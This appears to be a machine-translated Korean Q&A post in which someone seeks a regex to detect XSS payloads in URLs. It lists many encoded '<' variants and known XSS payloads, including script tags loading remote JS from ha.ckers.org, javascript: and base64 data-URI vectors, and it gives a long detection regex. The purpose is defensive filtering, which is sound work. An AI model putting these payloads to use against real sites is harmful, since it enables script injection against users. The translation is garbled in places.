다음 목록의 모든 XSS 페이로드와 일치하는 정규식

Question

다음 목록의 모든 XSS 페이로드와 일치하는 정규식이 필요합니다 (XSS 요청을 필터링하고 안전한 URL을 저장하려고하지 않습니다. URL 자체에서 페이로드 나중에 사용할 변수)에 저장 : 나는 하나를 발견하고 몇 가지에 맞게 편집 관리 않았다

http://www.example.com/subcat.php?id=24\x3c 
http://www.example.com/subcat.php?id=24\x3C 
http://www.example.com/subcat.php?id=24\u003c 
http://www.example.com/subcat.php?id=24\u003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24%3C 
http://www.example.com/subcat.php?id=24&lt 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&LT 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#60 
http://www.example.com/subcat.php?id=24&#060 
http://www.example.com/subcat.php?id=24&#0060 
http://www.example.com/subcat.php?id=24&#00060 
http://www.example.com/subcat.php?id=24&#000060 
http://www.example.com/subcat.php?id=24&#0000060 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#x3c 
http://www.example.com/subcat.php?id=24&#x03c 
http://www.example.com/subcat.php?id=24&#x003c 
http://www.example.com/subcat.php?id=24&#x0003c 
http://www.example.com/subcat.php?id=24&#x00003c 
http://www.example.com/subcat.php?id=24&#x000003c 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#X3c 
http://www.example.com/subcat.php?id=24&#X03c 
http://www.example.com/subcat.php?id=24&#X003c 
http://www.example.com/subcat.php?id=24&#X0003c 
http://www.example.com/subcat.php?id=24&#X00003c 
http://www.example.com/subcat.php?id=24&#X000003c 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#x3C 
http://www.example.com/subcat.php?id=24&#x03C 
http://www.example.com/subcat.php?id=24&#x003C 
http://www.example.com/subcat.php?id=24&#x0003C 
http://www.example.com/subcat.php?id=24&#x00003C 
http://www.example.com/subcat.php?id=24&#x000003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#X3C 
http://www.example.com/subcat.php?id=24&#X03C 
http://www.example.com/subcat.php?id=24&#X003C 
http://www.example.com/subcat.php?id=24&#X0003C 
http://www.example.com/subcat.php?id=24&#X00003C 
http://www.example.com/subcat.php?id=24&#X000003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24<script>alert(123)</script> 
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script> 
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss") 
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');"> 
http://www.example.com/subcat.php?id=24<img src=javascript:alert(&quot;XSS&quot;)> 
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME> 
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT> 
.... (for all see the URL) 

, 전부는 아니지만 :

<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*i\W*s\W*i\W*n\W*d\W*e\W*x|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\0\/]|['\"])(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\0]*= 

들어 예를 들어 here을 참조하면 <script>과 그 중 일부만 일치합니다 그 (것)들에 가득 차있는 성냥을하지 않을 것이다. URL의 XSS 페이로드 또는 XSS 페이로드를 찾는 더 좋은 방법과 일치하는 더 나은 정규 표현식을 가진 사람이 있습니까? 미리 감사드립니다.

Answer 1

단순히 함께 할 수있는 방법을 알아 냈 내장 된 라이브러리 : id=24<

[XSS 필터링을위한 파이썬 라이브러리?]의